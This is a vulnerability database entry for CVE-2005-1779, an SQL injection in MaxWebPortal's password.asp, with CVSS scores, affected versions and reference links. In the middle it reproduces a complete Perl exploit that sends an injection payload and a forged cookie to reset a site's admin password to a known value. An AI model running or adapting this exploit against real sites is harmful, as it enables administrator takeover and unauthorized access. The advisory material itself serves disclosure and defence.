CVE-2005-1779
CVSS7.5
Published: 2005-05-31 00:00:00
Last modified: 2008-09-05 16:50:04

[Original] SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via the memKey parameter.


[CNNVD] MaxWebPortal SQL injection vulnerability (CNNVD-200505-1249)

        MaxWebPortal 1.35, 1.36, 2.0 and 20050418 Next contain a SQL injection vulnerability in password.asp; a remote attacker can execute arbitrary SQL commands via the memKey parameter.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:maxwebportal:maxwebportal:2005-04-18
cpe:/a:maxwebportal:maxwebportal:1.36
cpe:/a:maxwebportal:maxwebportal:2.0
cpe:/a:maxwebportal:maxwebportal:1.35

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1779
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1779
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1249
(official data source) CNNVD

- Other links and resources

http://securitytracker.com/id?1014048
(VENDOR_ADVISORY)  SECTRACK  1014048
http://secunia.com/advisories/15511
(VENDOR_ADVISORY)  SECUNIA  15511

- Vulnerability information

MaxWebPortal SQL injection vulnerability
High risk  SQL injection
2005-05-31 00:00:00 2005-10-20 00:00:00
Remote
        MaxWebPortal 1.35, 1.36, 2.0 and 20050418 Next contain a SQL injection vulnerability in password.asp; a remote attacker can execute arbitrary SQL commands via the memKey parameter.

- Advisories and patches


- Vulnerability information (1010)

Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) (EDBID:1010)
asp webapps
2005-05-26 Verified
0 Alpha_Programmer
N/A
#!/usr/bin/perl
#################################################################
#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#################################################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d <irsdl@yahoo.com>
#
#################################################################
#  Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke   &  AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################################################
use IO::Socket;

if (@ARGV < 2)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set Underground Hacking Team      \n\n";
 print "      Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
 print " V3rsion :\n";
 print " 1 ==>   Version 1.35 and 0lder\n";
 print " 2 ==>   Version 1.36, 2.0 and Next\n";
 print "==========================================\n\n";
 print "Example:\n\n";
 print "    Max.pl www.Site.com 1\n";
 exit();
}
$hell = "foo' or M_Name='admin";
if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"};


my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "POST /password.asp?mode=reset HTTP/1.0";
$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
$http .= "Accept-Language: fa\n";
$http .= "Content-Type: application/x-www-form-urlencoded\n";
$http .= "Pragma: no-cache\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n";
$http .= "Content-Length: 111\n";
$http .= "Proxy-Connection: Keep-Alive\n";
$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n";

$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n";

print "\n";
print $remote $http;
sleep(1);
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
while (<$remote>)
{
}
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###

# milw0rm.com [2005-05-26]

- Vulnerability information

16847
MaxWebPortal password.asp memKey Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

MaxWebPortal contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'memKey' variable in the 'password.asp' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

- Timeline

2005-05-24 Unknown
2005-05-24 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author
